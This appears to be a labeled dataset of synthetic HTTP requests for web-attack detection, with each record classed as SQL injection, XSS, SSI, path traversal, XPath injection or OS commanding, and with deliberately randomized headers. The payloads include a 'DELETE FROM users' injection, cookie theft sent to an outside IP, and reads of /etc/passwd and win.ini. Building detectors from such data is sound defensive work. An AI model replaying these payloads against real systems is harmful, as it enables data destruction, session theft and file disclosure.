Pragma: no-cache
Proxy-Authorization: NTLM b2ZsaTZkVHVubWVyOTQ4YVFhdWVpc2RZbWFsc3ppaWR4V2VldHdobnJlZQ==
Authorization: Basic c2llc2Vzem86Ym5zaWxlbw==
Range: -3
Referer: /q83s0of/iSsXe3.js
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: owsrgss (mOmJBzoB; eLIls6t8V; ek4SOXi2; t3Pwtu6Z; oOcGsdiBTS)
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 105x8065
Via: 2.7 234.49.214.176, 8.2 www.vir8g.css
Transfer-Encoding: deflate
Upgrade: EC4/0.8, cEeq/4.6, ezga1/4.0, sop/3.8, d63oen/6.6
Warning: 736 www.zmeftdme.shtml:69 "oNaciecieersUyiosal" 
X-Forwarded-For: 115.149.203.202
X-Serial-Number: 356926769417178111
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43329
Start - Id: 42834
class: OsCommanding
GET /0ghaergaeeAaaEEirnt4/7httpsC-4jmS4dFrDu@/sIk9lWmh/andnLZTn-/9kP.swf?astio=y4oaiorxeSeupw&mwln=psvr2hR&psjarxaonN=57&ayeaU9sHao=%7C+++++dir+++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+++%2C&dmveu75ya=4+Qe4one HTTP/1.1
Host: www.oWtqtq.be
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 204.241.218.220
Cookie: gwhHIn4itoaTalr=h5;cno=nO>Jo
Date: Tue, 12 May 09 08:06:31 GMT
ETag: "pei1_qWjREV5RDdbfc"
Expect: 100-continue
From: deCV@nnnan.ch
If-Modified-Since: Sat, 24 Mar 07 09:41:32 GMT
If-Unmodified-Since: Sat, 29 Mar 08 17:37:41 CET
If-Match: "qI24.dZDibJe3hmEe"
If-None-Match: *
If-Range: Sat, 21 Jul 07 21:44:10 GMT
Max-Forwards: 680
MIME-Version: 7.9
Authorization: Basic dWVhUDpybm1ybWU=
Range: 2-3,62-,037879-912
Referer: http://www.enmaa.com/tTtai7/na6as/gi5Rhifs.mp3
TE: trailers,chunked
Trailer: Host
User-Agent: ryl6 (oKEbm6BOv; tou@CS6y5)
UA-CPU: Sparc
UA-Disp: 063,6155,16
UA-Color: color16
Via: HTTP/6.9 www.oNss.html:3, bte/6.5 168.41.44.75, HTTP/6.2 249.90.77.235
Transfer-Encoding: deflate
Upgrade: NhTeWO/2.9, teisee/0.9
X-Forwarded-For: 209.98.157.41
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42834
Start - Id: 35160
class: SqlInjection
POST /hqNrcqu6h58jRN.S.M7R/esbljhrwepk/lszBaeteuhDtro5e/dvapgUcHnahg4artno.exe? HTTP/1.1
Content-Length: 280
Content-Language: emo3ah
Content-Encoding: identity
Content-MD5: ZG5lbXR0YXR0aHN5aHRoNA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 21 May 09 21:12:40 UTC
Last-Modified: Fri, 27 Aug 04 17:44:09 GMT
Host: 20.136.231.48:9
Connection: close
Accept: text/*, audio/*;q=0.4, text/plain
Accept-Encoding: *
Accept-Language: o-Aidoe, b9-rHyysf6a, ulan-i7;q=0.2, snt3st-r15, i-tq
Cookie: nteu=44391075;natNitqg=nmm;up7t=2178091712
If-Modified-Since: Mon, 21 Aug 06 07:09:35 CET
If-Unmodified-Since: Tue, 21 Jul 09 21:32:59 GMT
If-None-Match: "jzHpNuQ2VbUKjXJ"
Max-Forwards: 75
Referer: /perd/rAs9a.gif
User-Agent: 2SbtRox5thngoA8s5J
UA-OS: Linux

7eidct7eSwend=0&onwewt0eeiSl=76h&emhlwEEhHh=aGgA&hetHeawgos=4&tcrlftr8f=e]tsow sts&l525= 9e%p8astp:aotD&cbie2slif=roR1r&lslhll=h3imgwindow.opengneuu&connecteSieHCj0y=qwer'   or   Rttg_v.Account='56anelR@ebtes.com&eio4Ellglihyt=318&rvwB==e9aTlgnayanj&@LuBy=32320807

End - Id: 35160
Start - Id: 49194
class: XPathInjection
GET /Ohttpc-dboot.iniMmmlikegh7bi/eQ2.r/eesaeenhraeealL/o0pg9KFsMLT-XAaF/dE/WaF9-5U@hmail.gif?dsereEsrei0=idrgjt%27+++or+++ItOd%2Fnp7g%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D12%5D++or++++%27absnmmie%27++++%3D%27&wp-sbH@qFExpp=4523 HTTP/1.1
Host: 55.153.96.158
Connection: Nyios
Accept: */*
Accept-Charset: utf-8, cp-950;q=0.6, iso-8859-5, x-mac-ce, x-mac-arabic;q=0.9
Accept-Encoding: deflate, compress;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 181.41.86.41
Cookie: jw1sHSNchild=st;rdkde=iy;rwteh1aeuen=mror;JhtpassPD=nSelreemorcanrptSn
Cookie2: $Version="0"
Date: Fri, 22 Jul 05 20:29:57 UTC
ETag: "vrp1kGmnEHoBox1Rdwu"
Expect: ntcb=sredwdkt
From: Gswzt6t2@seem.gov
If-Modified-Since: Fri, 30 Jan 09 24:50:27 GMT
If-Unmodified-Since: Mon, 22 Aug 05 06:35:00 UTC
If-Match: *
If-None-Match: "-irz3EhzGbphtIO"
If-Range: Sat, 15 Nov 08 06:20:50 GMT
Max-Forwards: 859
MIME-Version: 9.1
Pragma: odoa=ho
Proxy-Authorization: NTLM c2FoaU9qc3RsdG9uY2VodDg3a2Z4U3NsYWJpaWVhNTZ0bmVzb2g=
Authorization: ettl fttto6=retPfots
Range: 87-,-69535,7135-70843
Referer: /odMlor.rar
TE: chunked;q=0.7,trailers
Trailer: If-Match
User-Agent: tssOsss
UA-CPU: MIPS
UA-Disp: 344,403,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 400x881
Via: eOokn/9.8 217.25.2.241, FTP/7.1 www.qnaotl.html, 0.2 177.164.212.217:65514
Transfer-Encoding: rnes
Upgrade: ee3E/6.8, uget/3.4
Warning: 143 221.24.90.70:6149 "atInyfjon" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 094897870
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49194
Start - Id: 42504
class: SqlInjection
GET /hAnO-c1BkxVYYWmYLTmw/m1uivDVG_eVHJh3M4/DsWdC.phFwinntRautoexeckO3/amaHisy/Dnsiihuhoyo/KQ0F7wnph-hWsUK/h5eathISd6sp1a0iTet/httpI5GrFkXpassthrurzK/srs_lAKBdtcwc2oYtWii/phxQ98/2-BQrHZcc.xBvW/lHnlbhSOcerda.shtml?NF4SflDLcopyDtG=fymot%27++%29%3B+++DELETE+FROM+++++users++WHERE+++++upper%28username%29++%3D+++++upper%28%27admin HTTP/1.0
Host: www.dhclrrCr.cz
Connection: close
Accept: application/*;q=0.2, audio/*
Accept-Charset: iso-8859-8, utf-8;q=0.6, windows-1258
Accept-Encoding: gzip;q=0.6, identity
Accept-Language: ydeArsi-rbi5kCrf, wuid-0r5oj;q=0.4, iadgr-7odcso
Cache-Control: only-if-cached
Client-ip: 59.62.46.157
Cookie: drr=tsde;io=2fe o;wFC0httpse3= tgi6pipr;XexecU_=alnhtndttOECnias;KopassthruUpassthruk@c0=au;szelraoTrry4=667
Cookie2: $Version="85"
Date: Fri, 16 Apr 10 20:12:12 GMT
ETag: W/"Meb@PuEcS0MSg5w"
Expect: eb8e
From: sheo@RafNi.uk
If-Modified-Since: Wed, 22 Dec 04 20:34:49 CET
If-Unmodified-Since: Mon, 24 Mar 08 23:46:09 CET
If-Match: "L2Vij3R8ukgc0zgU"
If-None-Match: *
If-Range: *
Max-Forwards: 546
MIME-Version: 9.9
Pragma: n73wWo=Otd2do
Proxy-Authorization: Basic d2xpbjplbmsxaHk2bQ==
Authorization: Digest uri=http://noqluar.com/ntodeig/dth6.jpg
Range: 16802-
Referer: /uaye/vhdhtn/taLiri/moeUskA.rar
TE: gzip;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: urehecatxjadekElndbn
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 733x829
Via: 8.1 www.evei.gif, HTTP/6.5 111.6.60.100, FTP/0.4 167.241.136.142
Transfer-Encoding: deflate
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 504 127.15.72.187:71097 "tehsu6o03" "Sat, 20 Aug 05 24:15:38 GMT"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 171208894897748
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42504
Start - Id: 48026
class: XSS
GET /Rko/az.asmx?etBernlea=6&nytwcsshldGx=1840&JQeEz=t%25tnTyc1dtuim&nMijeC7mgf=2aesXmamadrc&RoHWsmhzT9=348&dzdlma=%3Cimg+++src++++%3D+++%22+++mocha%3A%5Bwindow.open%28%27http%3A%2F%2F151.79.109.88%2Ftato.cfm%27%2Bdocument.cookie%29%3B%5D+++++++%22%3E&eeU=3KS2&aseoTnddaeaI=xnP3&sTtshPrtgpn4s=lw7ZCm.ZXb08 HTTP/1.0
Host: www.Javzk4D.st
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-cyrillic;q=0.7, iso-8859-7, x-mac-chinesesimp, cp-950;q=0.0, windows-1252
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 187.82.70.221
Cookie: jaft8CexrLibt=2770492
Cookie2: $Version="114"
Date: Fri, 09 Dec 05 22:34:15 CET
ETag: "5ZVr1ovQqwgeRKbGnUW"
Expect: 0er3ncru
From: uesois@ewrsoxtt.it
If-Modified-Since: Sat, 13 Oct 07 06:38:52 UTC
If-Unmodified-Since: Tue, 02 Dec 08 12:40:20 CET
If-Match: *
If-None-Match: "9@Ot16SETGz0f-d1rm"
If-Range: *
Max-Forwards: 2
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: umrl cmws=Yzunt
Authorization: NTLM bG9lZWRlTDJlaHJ0bm1hclRTbnRtaWdzb3Z0SWl5V2VtNXQ=
Range: 3837-2
Referer: http://enelN.it/anoyl/f1tRehs9.cgi
TE: gzip;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/1.4 (Machintosh; U; PPC 7.1; tu-ft; rv:7.4.8) Gecko/08313192
UA-CPU: PowerPC
UA-Disp: 212,5646,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0874x138
Via: o2n/5.7 www.GBIru.js, 9.8 27.225.238.213
Transfer-Encoding: gzip
Upgrade: odv/3.8, cye8/8.2
Warning: 409 www.nwho7d.jpeg "t6otamehitht" "Sat, 04 Sep 04 24:22:06 CET"
X-Forwarded-For: 177.208.72.84
X-Serial-Number: 698729021
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48026
Start - Id: 40580
class: SSI
GET /8tI/f4OoawhitneicaI/HthaseicSmtnejTb3/mfetoam4nfeatpajnnni/fYVg/oIQl-adZhK8/ltnfeontp3nl.htm?rc3lSxhode=79&w4ooeor=%3C%21--%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&oegMDit=32086&rshooclhhe4b=7&ecomhtt=rG2ctatdaahN&oHlugeusveffig=semajawgwhed&ndc7t=aZqvR6K0ZWcs&zMnB50n5DhY=9870 HTTP/1.0
Host: www.p7oe.net
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: max-age=202
Client-ip: 18.199.244.27
Cookie: daAsdosh=o8QE97;smarrtzscc4rH=118570;chaoat5Xmqsd=2885145
Cookie2: $Version="2"
Date: Sun, 26 Apr 09 23:11:47 CET
ETag: W/"zTQC3.87LXl7-H06oh"
Expect: 100-continue
From: ret4rl@tllbrq.it
If-Modified-Since: Sun, 24 Jul 05 03:26:50 GMT
If-Unmodified-Since: Sat, 25 Apr 09 11:55:01 GMT
If-Match: *
If-None-Match: "9L.p7udFEVJES7DIDNK8"
If-Range: "sIv8FxhDI.fIwH9K"
Max-Forwards: 743
MIME-Version: 9.1
Pragma: tE=ter
Proxy-Authorization: iseoyl snmerayt=A2dhraa
Authorization: Basic b3Job3R5YTpyaThoVGwwaQ==
Range: -624002
Referer: http://iradm.fr/inxeei.pdf
TE: deflate;q=0.8
Trailer: Date
User-Agent: Mozilla/5.2 (X11; U; Unix 4.4; gh-ht; rv:7.5.8) Gecko/88129990
UA-CPU: PowerPC
UA-Disp: 563,477,16
UA-OS: Windows 98
UA-Pixels: 8517x087
Via: HTTP/1.6 118.151.109.145, 6.7 www.d0ta.png:0736, FTP/1.4 www.uzou.png
Transfer-Encoding: gzip
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 835 www.trhpd.htm "psE9Ldemvcians32" "Sun, 26 Nov 06 20:41:29 UTC"
X-Forwarded-For: 35.78.67.33
X-Serial-Number: 69115
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40580
Start - Id: 45719
class: PathTransversal
GET /eRsvD4fQCqqNeCQB/rjrafddeeLabn/r4ndYK/uxMieWhhvZm/eO/vgOWx0Ldk@.php4?snadEttisen=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fmaaschve%2Fventator%2Fento%2Fllen.asmx&DL9W8AEdm0H=3285&ilt8pi=55558 HTTP/1.1
Host: www.dnmnwosz.com
Connection: gyrsnam
Accept: video/*;q=0.5, application/*;q=0.8, image/gif;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 213.38.176.90
Cookie: dDobl4rsn=115;KOGOFZi=67694
Cookie2: $Version="66"
Date: Tue, 21 Dec 04 13:34:16 UTC
ETag: W/"skf@5ex@3kGAQzU0"
Expect: ipgDtc4E
From: reani1tb@daeireeubl.de
If-Modified-Since: Mon, 28 Mar 05 02:55:16 UTC
If-Unmodified-Since: Sun, 29 Jan 06 21:04:03 UTC
If-Match: *
If-None-Match: "wVohVIL27Q2lpzvZGMki"
If-Range: Sun, 04 May 08 13:52:30 GMT
Max-Forwards: 96
MIME-Version: 2.1
Pragma: nr=E
Proxy-Authorization: Basic dGlvb2VyOmVleXQwbnBQ
Authorization: Digest username="eelt9"
Range: -500252,934-3694
Referer: /dtEdnb/r5rta/itsrahe/ftei.nsf
TE: chunked
Trailer: Cache-Control
User-Agent: 5tcslt (8VUTXw; hvMP-fb7; etJGl1RC@Y; sGUzdpr)
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 967x7308
Via: FTP/5.1 www.IEbcnloh.tiff, 3.7 www.s6di.jpeg, 8.6 33.206.197.118
Transfer-Encoding: enheoh; vb6aF=haMe2hf
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 159.195.9.102
X-Serial-Number: 1618317
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45719
Start - Id: 42369
class: SqlInjection
GET /wydmeuootluEm1/passwdwkexecIld2rV/axh3AEa/ee7Evora/hE2ieeDu0ietxi3ieyeb/0JGOq48tYLkHB1/lttsN29y/e39e6aroo1uaaeasttne/i4ZisKlDkCRE.8RDA.mdb?rIr9arithusen=oOiX&staex=select+eArd7MoE+from+ALL_USERS&dtaoehqlq1zaez=jvqYQE.&smailH.Rzk=ap0qTE1&erg=xot%5Deimgn%25&mailastdinu=8&D9tFPsamg.e=%5C%40ls&saevejhs=465&Ceof8Iwni=+gfrom&eoaot=iQcibjy HTTP/1.1
Host: 11.77.136.220:6
Connection: keep-alive
Accept: video/*;q=0.8, image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 9.111.68.72
Cookie: gensyeomdUned=238;on4Uith=isameoOn9%ad;ntdIr=rIz]
Cookie2: $Version="2"
Date: Fri, 30 Dec 05 01:18:56 CET
ETag: ".pHQcBCpLNiI3Vv"
Expect: yslocn=vUdhtgTh;enre
From: orh6@rgaag.org
If-Modified-Since: Sat, 19 Mar 05 14:56:26 CET
If-Unmodified-Since: Fri, 16 Jul 04 17:44:04 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Apr 09 21:41:19 UTC
Max-Forwards: 8
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: dlmr slzlneo=pHmge92s
Authorization: Digest opaque="etieea"
Range: -966,396-333,-3990
Referer: /eozHecel/elni/vshrLmA/soqas67/rn79pmoU.php
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: err1iympYa (himp0upVck; 8FAAyWQf)
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1680x018
Via: 0.9 24.65.139.68, HTTP/5.3 106.15.140.9
Transfer-Encoding: h2e0an; l3edmih=theNo
Upgrade: ptai/1.8, nrw/3.3, 5vdio/0.4, eol/0.5, rtemsh/1.9
Warning: 423 132.125.191.161:87 "rdoiorrnoghcct9sL6ci" 
X-Forwarded-For: 13.105.161.65
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42369
Start - Id: 40716
class: SSI
PUT /er/ipk3w.9gn1xo.r/Erwteapn/el.jpeg? HTTP/1.1
Content-Length: 219
Content-Language: wsal
Content-Encoding: gzip
Content-Location: http://www.ae4tEetn.net/ads1ruee/5tlHmo3/cnznW9as.cgi
Content-MD5: ZWFuc3Vkb2ZSZW9jZUhybw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 25 Mar 10 16:36:17 CET
Last-Modified: Mon, 18 Aug 08 14:44:19 UTC
Host: 245.227.32.18
Connection: keep-alive
Accept: text/*;q=0.9, video/quicktime;q=0.9, text/*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: compress, compress;q=0.3, identity, compress;q=0.9
Accept-Language: *
Cache-Control: no-store
Cookie: amte=Cajohdrops s;4rHiar=<!--#include  virtual="c:\winnt\system.ini"   -->
Cookie2: $Version="10"
Date: Sun, 22 Jan 06 09:00:46 UTC
Expect: 100-continue
From: Thinhii@ukssoqRit.biz
If-Unmodified-Since: Fri, 28 Dec 07 11:37:29 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 782
Pragma: no-cache
Authorization: aujbtd IaiaReD=iuteyL
Range: -77727,9-71
Referer: http://www.oirjdd.ch/6sheed/iriHiaie/rwiwd/haiaA.cfm
TE: trailers,trailers
Trailer: Pragma
User-Agent: lpIzZu http://www.eortndUt.org
UA-Disp: 494,893,16
UA-Color: color32
Via: o9tc/9.0 www.keoy7ear.gif:3887, 7.9 125.204.12.177
Transfer-Encoding: gzip
Warning: 835 www.A4rehs.tiff "ncdt" 
----: -----------------

eVeOf=passwd%an&Urouc=bodyae&or=0784804606&o0dNi8pq=teuat&oess=763&ZIYechoLNMY2=hyeisdrls&u1t2Hjq8effntdm=r5YLEv6Zfe0&esSh=e4chettbwty&has8an7=u&s4oeod0vq=6g7M8ikaa&caservtpnaeeeh=iiy6E1p_&9tiA35fSet=l8i3owxhnfeT2kEEe

End - Id: 40716
Start - Id: 39721
class: SSI
GET /aopsdo6ryatevBgsn/Nnneiyn6ibaoahul/i-bwFO7EUI4fwU29/zi5bVDVM4Ka8/btXD69.asp?ndoyoeoItg7tid=rn6to8hiitmann&2aondiieSNnrt3o=Tcnasea3dE&lZ6NOtelnetZyu=%3C%21--++++%23include++++virtual%3D%22%2Fetc%2Fpasswd%22++--%3E&bui6lEusles=3827700859&eneaoMt=9a&ptemdhbttt9ssR=4007979&tUdawoc9elexnhH=suDeuad6 HTTP/1.1
Host: www.aoit.it:8823
Connection: mrws
Accept: video/quicktime;q=0.4, video/*;q=0.2, audio/*
Accept-Charset: koi8-r, x-mac-roman, koi8-r
Accept-Encoding: 
Accept-Language: ojae-h9i;q=0.1, iO-g;q=0.3, eh6R-ssts
Cache-Control: no-transform
Client-ip: 201.153.47.247
Cookie: tnc=2;ts5nr9x=128;etr=92789
Cookie2: $Version="57"
Date: Sat, 10 Oct 09 21:41:17 UTC
ETag: "S3drG_PYWSBZhlFGgd0W"
Expect: 100-continue
From: iltkt32@r7Muj.it
If-Modified-Since: Fri, 25 Jul 08 23:35:46 GMT
If-Unmodified-Since: Sun, 21 Jun 09 03:44:38 GMT
If-Match: ".EbmB.K54B80ugH"
If-None-Match: *
If-Range: "LMELrdm0q4y3CH.e"
Max-Forwards: 2811
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest nc=CBADdAaC
Authorization: uoao sivueirq=ctprthen
Range: 02-82069,-940191,6-9
Referer: /bcnt/tdsrtuzh/8dcirelm/zDat.asmx
TE: trailers
Trailer: Host
User-Agent: 39edtutH
UA-CPU: x86
UA-Disp: 3264,053,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 066x3039
Via: 1.7 250.91.146.42:45, 6.4 www.ucuA.shtml:130
Transfer-Encoding: reheys
Upgrade: eoe/8.5, rhosn/0.5, slnwao/7.8
Warning: 414 39.123.241.242 "diuAtlysh" "Sat, 05 May 07 01:06:17 GMT"
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 9911764547155
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39721
Start - Id: 35967
class: PathTransversal
GET /irVI8-/rggns/Lhnqffooserotety/tB.js?eq5cNta5uyied=iy%7E&teksdtg1ttnr17t=shon2&tT7ctvye=ifromcl&hvai=0_ifXxt&cahaOytp8eiaeeo=iqadcrSP&ltalaezdhei=replaceahE&9orUemhnws=73&modbdnibn=tQXsSo1Ym2aH&oscamLohAgH=lk5i%7E%7Eeioasdnuw&hriTelrafatre3=ed3y&Ewb=403&4hr9=684625&OEBgs5o.copy-24=%7Ee HTTP/1.1
Host: www.agcieYpomx.it
Connection: close
Accept: */*
Accept-Charset: utf-7, x-mac-ce, windows-1255, x-mac-korean
Accept-Encoding: *;q=0.2
Accept-Language: s-deseAakt, ebtrxpl-l, salA-ofD;q=0.9, bs-A;q=0.5, Lrontsko-iit
Cache-Control: max-stale
Date: Sat, 03 Jul 04 11:01:52 CET
ETag: "NncMXndbyMQ9IlXHx"
Expect: 100-continue
From: teSMw1ts@vyPsooEwhr.de
If-Range: Tue, 12 May 09 03:43:58 CET
Max-Forwards: 612
MIME-Version: 6.5
Pragma: no-cache
Authorization: Basic ZUN3eDpkbmFm
Range: 87789-,80045-
Referer: /aajdfke/ai7INr.sh
User-Agent: ../../../WINNT/autoexec.bat
UA-CPU: MIPS
Via: FTP/4.3 www.t5brOp.html
Transfer-Encoding: 7s2ke6; oEwthpMl=1fri

null

End - Id: 35967
Start - Id: 45051
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.1
Host: www.qqarrotnsy.de
Connection: cntr
Accept: */*;q=0.2
Accept-Charset: iso-8859-4;q=0.4, windows-1258;q=0.7
Accept-Encoding: identity;q=0.8
Accept-Language: ue-sB;q=0.6, dietow-nyexl;q=0.9, iti-Ihr5e, gdhi-rfeooMl, m3eere-DVcS;q=0.2
Cache-Control: foth=wesa9if
Client-ip: 69.142.236.19
Cookie: meicteezn7e=1091798;p9hEogta=04833025;fqADFy3viH=32934;XtjtMMB7wmeta3=c;sbann=061535;eaenYNa=Iatoalcioriire
Cookie2: $Version="8"
Date: Mon, 05 Sep 05 24:59:05 UTC
ETag: W/"tEDzViflK5b0IYZZ"
Expect: 100-continue
From: Otai@40ezesm.uk
If-Modified-Since: Sat, 01 Dec 07 15:54:58 CET
If-Unmodified-Since: Thu, 27 May 04 23:47:01 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 14 Jul 08 20:42:00 CET
Max-Forwards: 50
Pragma: no-cache
Authorization: NTLM cnpvczh0amN6ZTdlOWFlVGlyb3NEYWRlbGVoaFppeTIwZQ==
Range: -6543,-6,-30
Referer: /ooppt1/rhhomTth/gl1ukam/edpcMnTe.rar
Trailer: Host
User-Agent: neniEi1 (cnwHnAQUcX; eORWkWmG)
UA-CPU: MIPS
UA-Disp: 7777,3718,16
UA-OS: Windows 95
UA-Pixels: 127x929
Transfer-Encoding: gzip
Upgrade: sLa/4.9
Warning: 905 80.144.212.89 "cvcWhwiseqlaaOni" "Wed, 28 Jan 09 19:24:15 UTC"
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 23020199164875
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45051
Start - Id: 48784
class: XPathInjection
GET /lhrorOaalnsdnttcza/ti6ts7/stwrn0xsEir/5fveLHBB.yXQu01PO/ntZr/rooebltr/rsgnaxvgtnscJxyitt/guE/eb./Hv/s5Di2a9SCaiaEnw.sh?xuithe=yVzqrIxVqH&eSnk=nUtmitul%27++++or+%28i+++%3C+++count%28eima%2Fchild%3A%3Atext%28%29%29+++++and+++++j+%3C+++++count%28agy9h%2Fchild%3A%3Acomment%28%29%29++and+++++k++++%3C+count%28t1fmU%2Fchild%3A%3A*%29++%29++or+++%27oxxEtt%27%3D++++%27+auuhtem%27+++or&dgilrrhs=rtdticosqosnG&eniepda3m3sRdr2=Rzn+qb+b8r&vOn7Wtugoijs=rjmsik&GJn=63606&7idyte=tha&o6Te80rbaiv=oIca3f9utnebti2&input9V%u=tY--T HTTP/1.0
Host: 5.7.125.101
Connection: keep-alive
Accept: audio/basic, video/mpeg, application/x-tar;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Neualleh-hnons;q=0.9, etanls-iaeeDooM, sweril-hguU5ar, fsYebiaw-acodx4e;q=0.8
Cache-Control: no-transform
Client-ip: 132.160.12.174
Cookie: airovEi2bi=eoSK;ciIleii4=49821
Cookie2: $Version="33"
Date: Sat, 31 Jan 04 04:15:38 CET
ETag: "t_wbub8hlouKz7ojG"
Expect: 100-continue
From: iinongn@mnxs.it
If-Modified-Since: Wed, 30 Jan 08 04:28:44 CET
If-Unmodified-Since: Thu, 02 Mar 06 22:14:27 CET
If-Match: "glA7ks0odPEJA2x"
If-None-Match: "3v1xc3Y@aP5V96lDrok"
If-Range: "Hht5g1_0RxjQCKvG9"
Max-Forwards: 862
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: bfgi rtRa=dsun
Authorization: NTLM ZW9JeWdhbzhVc2J0amhrdFZpbmVlcm1vVHRucVQxZ3p0cWpodGhmb2ZlZA==
Range: 512488-28725,-179,34439-
Referer: http://Snogo.biz/ktcdynon/ymu5vl/tlibsqC.jsp
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/4.5 (Machintosh; U; Mac OS X 5.6; us-tn; rv:1.8.0) Gecko/56078710
UA-CPU: Sparc
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0640x829
Via: HTTP/5.7 www.ek1n.html, 8.6 80.28.150.184
Transfer-Encoding: deflate
Upgrade: dMji/4.6, m1ce/2.1, ittqim/8.3, stojw/5.9, fftt/6.2
Warning: 022 17.182.45.11:3 "otrr6o" "Sun, 18 Jun 06 04:34:44 GMT"
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 91085998772983
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48784
Start - Id: 35850
class: XPathInjection
GET /daeosEhemtreE5/9JW5@1dkIZBBM/sm5WsF-/UrglrreuuUl9onaa/eiX.1jgVvNvyH/wDlOR5/eIt0tdnoopely.jpg?eebzart=339195&ee6enpworutms0p=jD25rcrL2l&soonW=Nnnory&xPEh__=tetoku%28q4lHhcrloin&1b4Qobjectopeny=thh%2Fitfprr%2Famen%2Fchild%3A%3Anode%28%29%5B+++++position%28%29%3D7%5D++%7C++++igt%2Fthtmea%2Fnne%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D746%5D++++or+%27dsams%27++++%3D+++%27&acdero=4197&oISsTeeubR=u%7Eme&tB4AMcQc-3t=+ HTTP/1.1
Host: www.knaahLi.org
Connection: aasa
Accept: application/zip;q=0.4, audio/*, text/plain;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 177.161.53.181
Cookie: roshst=ddhPeuuf'ara8;bvt=tuWeh;lPhdea=1243929390
Cookie2: $Version="398"
Date: Fri, 15 Dec 06 08:43:22 CET
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: iasENO
From: wcsotyes@fnolepci.st
If-Modified-Since: Mon, 13 Dec 04 19:03:32 CET
If-Unmodified-Since: Fri, 14 Jan 05 21:20:23 CET
If-Match: "uVEX3euv.sny8oVnf5Sk"
If-None-Match: "@FW8yxa3Owe8fV_t"
If-Range: Sun, 29 Jan 06 04:01:31 UTC
Max-Forwards: 06
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest username="ioula3"
Authorization: NTLM bnRvT2ppUlFhYmhwb25pdHU0b2NlZUZyMGVpaHJsYXllaXdvTmU=
Range: -15
Referer: /orws/nfetd/uhiedssg/tuuaeeIc.tiff
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/4.3 (X11; U; Open BSD i586 6.8; st-6E; rv:7.8.0) Gecko/62040008
